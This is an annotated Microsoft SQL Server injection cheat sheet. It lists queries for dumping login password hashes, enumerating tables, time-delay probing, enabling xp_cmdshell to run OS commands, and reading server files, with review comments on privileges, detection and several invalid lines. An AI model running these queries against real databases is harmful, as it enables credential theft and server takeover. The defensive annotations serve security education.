MSSQL Injection Cheat Sheet

5 August 2021 - Articles
# Comments
/* Comment */
-- -

# Version
-- @@VERSION is the T-SQL system function that returns the server's
-- version/build string.
SELECT @@VERSION;
-- NOTE(review): version() is not a T-SQL built-in (it is the PostgreSQL/MySQL
-- spelling); on SQL Server this statement fails with an
-- unrecognized-function error.
SELECT version();

# User details
-- Expressions (not complete statements) that report the security context of
-- the session. CURRENT_USER is the database user; SUSER_NAME() and SYSTEM_USER
-- are the server login. The account shown is the one the application connects
-- as, so its permissions bound what any statement in the session can do --
-- the reason application logins should be least-privileged.
-- NOTE(review): in T-SQL, CURRENT_USER and SYSTEM_USER are niladic and are
-- written without parentheses; the "()" forms below are rejected by the parser.
current_user()
suser_name()
system_user()

# Database details
-- DB_NAME() with no argument returns the name of the current database.
SELECT db_name();

# Database credentials
-- sys.sql_logins lists SQL Server-authentication logins; password_hash is a
-- varbinary column holding the salted hash, not the clear-text password.
-- NOTE(review): the hash is only exposed to highly privileged principals
-- (sysadmin / CONTROL SERVER-level); confirm the exact permission for your
-- version. An application login that can read it is over-privileged.
SELECT name, password_hash FROM master.sys.sql_logins
-- Same data as one string: fn_varbintohexstr (an undocumented system function)
-- renders the varbinary hash as hex text so it can be joined to name with "+".
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins

# Server details
-- NOTE(review): HOST_NAME() returns the workstation name reported by the
-- *client* of the connection (for a web application, typically the app
-- server), not the database server's name. The value is client-supplied and
-- must not be trusted as a security control.
SELECT host_name();

# Table Name
-- sysobjects is a legacy compatibility view; xtype = 'U' selects user tables.
-- The master.. prefix limits this query to objects in the master database.
SELECT name FROM master..sysobjects WHERE xtype = 'U';
-- ANSI catalog view for the current database; it also lists views
-- (distinguished by the table_type column).
-- Both queries return only objects the caller has some permission on, so a
-- least-privileged login sees correspondingly less metadata.
SELECT table_name FROM information_schema.tables;

# Column Names
-- 'tablename' is a placeholder for the table of interest.
-- Legacy compatibility views: look up the table's object id, then its columns.
-- The "=" subquery raises an error if more than one object has that name
-- (e.g. the same table name in two schemas).
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename');
-- ANSI catalog equivalent; matches the table name in every schema of the
-- current database that the caller can see.
SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename';

# String Concatenation
-- Expression fragment; foo and bar are placeholders. CONCAT() is available
-- from SQL Server 2012 and treats NULL arguments as empty strings. The older
-- "+" operator instead yields NULL when any operand is NULL (under the
-- default CONCAT_NULL_YIELDS_NULL setting).
CONCAT(foo, bar)

# Conditionals
-- IIF(condition, true_value, false_value) is shorthand for a two-branch CASE
-- expression (SQL Server 2012 and later). Here the condition is always true,
-- so the statement returns 1.
SELECT IIF(1=1, 1, 0);

# Time-delay
-- Suspends the batch for 9 seconds (the literal is hh:mm:ss) and holds the
-- session for that long. From the defender's side, a response time that
-- tracks a client-supplied delay shows the input reached the SQL batch;
-- parameterized queries prevent that, and a command timeout on the
-- application's connection bounds the stall.
WAITFOR DELAY '0:0:9'

# Command Execution
-- xp_cmdshell is disabled by default. The first two sp_configure/RECONFIGURE
-- pairs expose advanced options and then turn the feature on; changing server
-- configuration needs ALTER SETTINGS (held by sysadmin/serveradmin), so this
-- sequence only succeeds when the connection is already highly privileged.
-- Detection: each sp_configure change is written to the SQL Server error log
-- ("Configuration option 'xp_cmdshell' changed from 0 to 1"); alert on it and
-- on any use of xp_cmdshell by an application login.
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
-- Runs an operating-system command; for sysadmin callers it executes as the
-- SQL Server service account, so that account should itself be low-privileged.
EXEC xp_cmdshell 'dir';

# Read Files
-- OPENROWSET(BULK ..., SINGLE_CLOB) returns a file's contents as a single
-- varchar(max) value. N'' is an empty path placeholder; the statement fails
-- until a file path is supplied.
-- Requires the ADMINISTER BULK OPERATIONS permission (bulkadmin role), which
-- an application login should not hold. For SQL-authenticated logins the file
-- is read with the SQL Server service account's filesystem rights.
SELECT * FROM OPENROWSET(BULK N'', SINGLE_CLOB) AS Contents

# Substrings
-- SUBSTRING(expression, start, length); start is 1-based in T-SQL, so this
-- returns 'F'.
SELECT SUBSTRING('Foobar', 1, 1);